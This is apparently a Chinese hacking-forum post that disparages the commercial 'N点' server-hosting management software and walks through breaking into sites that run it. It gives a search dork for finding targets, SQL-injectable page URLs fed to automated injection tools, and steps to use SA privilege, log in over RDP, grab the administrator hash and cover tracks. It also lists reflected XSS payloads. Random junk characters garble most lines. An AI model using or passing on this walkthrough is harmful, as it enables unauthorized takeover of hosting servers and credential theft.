不得不说N点实在是一个破东西
, M1 j3 t J4 ]% n$ ?* z: `/ Q! X就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂5 d' _# U# o7 N2 q' Z
好吧 抱怨一下就行了 接下来关键的时候到了
5 @ l& E5 m. R首先百度搜索关键字:inurl: (mmdatabase.asp)
2 b6 G& j: p, b3 r! J9 |我随便列举一个: www.xxxx.com x) @3 r% a1 o5 A: _( n
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
0 N# Y: Z' ~! z4 r/ D; u- }7 P扔入NBSI 或者啊D等各种傻逼工具后
5 Z% |: Q! r, ~) o" V( e2 i0 @) f: q你们会看到是SA权限& g0 {& U' Q! a+ ?' {) K0 |2 Q
果断3389 上去 hash得到administrator密码
- W* _6 o' w3 J }- f' y擦屁股走人~) j% L7 I* g. B' t' X, {3 {" B! T
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
1 r$ B2 R$ K$ T* ]# v& u8 ~3 [ / F; S5 r: L9 Q$ F+ ~& s
再附上其他几个漏洞页面
9 z `" m# w0 v4 O: L6 K MSQL:( `' r+ _+ o. b- ^
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
}3 x$ h+ X+ j; M. D5 V/ }6 x; Bhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=112 M+ @6 K7 H$ X: h1 k' c# H
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9$ o! q/ x; K' I. m& U/ ^
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2: ?: l1 c7 r. q5 D U \
XSS证明:
+ s' L" V- H. ?4 `. w" T ]# F+ ]http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”3 ^6 |1 ?6 H: x" g$ C
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”0 g: B$ u1 x0 M" q7 n( l
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>6 V, @! E e8 l+ M" j( G+ U
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜& q6 y7 ]: P e, h! o
还是星外吧 你们懂的
9 f4 e& R G; o2 s! j) V& z: Z作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?, q( r/ N& r2 K! l8 d# _3 [
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
9 N( F+ q; k9 c1 ^( ^——- |